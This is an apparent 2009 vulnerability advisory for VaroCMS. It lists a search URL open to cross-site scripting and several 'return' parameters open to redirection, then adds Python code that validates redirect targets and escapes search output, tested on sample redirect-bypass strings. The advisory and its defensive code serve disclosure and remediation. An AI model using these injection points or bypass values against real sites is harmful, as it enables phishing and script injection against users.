# Exploit Title: VaroCMS: Community Voting Web2.0 CMS XSS & Open Redirection
# Date: 22/12/2009
# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com
# Version: VaroCMS: Community Voting Web2.0 CMS
#
#[Cross Site Scripting]
http://www.varocms.com/demo/search?q=[XSS]
#
#[Open Redirection]
http://varocms.com/demo/login?return=[URL]
http://blog.varocms.com/demo/register?return=[URL]
http://www.varocms.com/demo/resize/1024?return=[URL]
http://www.varocms.com/demo/resize/1280?return=[URL]
http://www.varocms.com/demo/resize/1600?return=[URL]
http://www.varocms.com/demo/resize/1920?return=[URL]
#
#
#[E0F]
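
A server-side check for the two parameters listed above (`return` and `q`), as an added example that is not part of the original advisory and is not VaroCMS code. The function names, the `/demo/` fallback and the policy of allowing local paths only are assumptions.

```python
import html
from urllib.parse import urlsplit

# Assumption: the application only ever needs to send users back to a local
# path on the same site, never to another host.
DEFAULT_TARGET = "/demo/"


def safe_return_target(value, default=DEFAULT_TARGET):
    """Return `value` only if it is a same-site absolute path, else `default`."""
    if not value or not value.startswith("/"):
        return default
    # Browsers resolve "//host" and "/\host" as scheme-relative URLs and strip
    # tabs and newlines before parsing, so none of these may pass.
    if value.startswith(("//", "/\\")):
        return default
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        return default
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return default
    return value


def render_search_heading(q):
    """Echo the search term into HTML with markup characters escaped."""
    return "<h2>Results for: " + html.escape(q, quote=True) + "</h2>"


# Constructed sample values for the `return` parameter (not from the advisory).
SAMPLES = [
    "/demo/profile?tab=1",
    "http://example.invalid/",
    "//example.invalid/",
    "/\\example.invalid",
    "/\t/example.invalid",
    "",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "->", safe_return_target(sample))
    print(render_search_heading('<b>"term"</b>'))
```

Only the first sample is accepted as a redirect target; every other value falls back to the default path.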